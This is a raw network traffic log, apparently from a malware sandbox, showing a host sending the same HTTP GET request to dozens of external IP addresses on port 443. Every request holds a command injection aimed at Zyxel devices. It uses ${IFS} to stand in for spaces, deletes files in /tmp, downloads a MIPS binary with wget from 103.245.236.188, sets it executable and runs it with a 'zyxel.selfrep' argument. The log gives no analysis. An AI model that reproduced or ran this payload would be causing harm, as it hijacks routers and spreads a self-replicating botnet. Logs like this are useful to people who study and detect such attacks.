                                                Jan 12, 2024 18:24:24.570894957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1652192.168.2.13401988.136.142.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.570950985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1653192.168.2.1349208151.142.201.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.570970058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1654192.168.2.1356578131.40.27.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.571026087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1655192.168.2.1359364167.67.105.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.571049929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1656192.168.2.1357864206.26.12.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.571089029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1657192.168.2.133331039.42.166.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.571131945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1658192.168.2.1337736178.241.201.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.571168900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1659192.168.2.1352596168.214.236.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.571202040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1660192.168.2.1360026207.18.124.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.571239948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1661192.168.2.1332874170.193.182.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.571274996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1662192.168.2.135915882.12.183.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.571326971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1663192.168.2.1336294160.246.204.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.571358919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1664192.168.2.1359234160.59.142.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.571413994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1665192.168.2.1354686140.159.97.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.571436882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1666192.168.2.134964841.102.154.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.571464062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1667192.168.2.13376424.68.254.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.571516991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1668192.168.2.1348994148.24.113.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.571561098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1669192.168.2.1352410134.17.196.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.571607113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1670192.168.2.1341244194.25.121.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.571635962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1671192.168.2.1335020192.49.12.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.571665049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1672192.168.2.135466860.85.71.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.571696043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1673192.168.2.1349916126.215.109.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.571738005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1674192.168.2.135324224.16.180.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.571778059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1675192.168.2.1352744122.80.137.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.571827888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1676192.168.2.135414446.235.104.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.571840048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1677192.168.2.1352350174.235.248.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.571882010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1678192.168.2.1348530212.65.77.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.571937084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1679192.168.2.1350508161.148.103.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.571952105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1680192.168.2.1344720159.175.17.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.572000027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1681192.168.2.1334348200.7.138.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.572057009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1682192.168.2.1352394206.243.27.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.572082996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1683192.168.2.1334388123.227.84.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.572123051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1684192.168.2.13582165.213.183.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.572994947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1685192.168.2.1333908204.123.124.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.573434114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1686192.168.2.134870876.56.231.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.573647976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1687192.168.2.134650681.16.43.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.574480057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1688192.168.2.1335650136.165.21.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.575501919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1689192.168.2.1347808190.242.181.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.575953960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1690192.168.2.133943275.69.26.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.576046944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1691192.168.2.133755279.107.30.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.576088905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1692192.168.2.1359062146.215.95.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.576137066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1693192.168.2.133602440.242.85.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.576200008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1694192.168.2.135388441.104.17.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.586575031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1695192.168.2.1354116191.87.167.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.586628914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1696192.168.2.1352348124.91.73.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.586671114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1697192.168.2.135566250.223.193.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.586740971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1698192.168.2.133678270.229.160.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.586772919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1699192.168.2.135687227.139.151.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.586807966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1700192.168.2.1343604110.4.254.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.586879969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1701192.168.2.1339042178.139.106.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.586930037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1702192.168.2.1347136180.43.107.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.586972952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1703192.168.2.1356224151.175.154.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.587029934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1704192.168.2.134058885.76.233.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.587076902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1705192.168.2.1334316110.161.154.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.587130070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1706192.168.2.135814457.69.149.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.587156057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1707192.168.2.1355550150.156.150.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.587189913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1708192.168.2.1343358193.103.44.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.587243080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1709192.168.2.1340312204.60.251.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.587280989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1710192.168.2.1338212112.225.15.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.587326050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1711192.168.2.1356744198.119.158.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.587376118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1712192.168.2.1341772190.253.88.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.587415934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1713192.168.2.134950454.166.201.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.587471008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1714192.168.2.1344164186.192.191.128443
                                                TimestampBytes transferredDirectionData
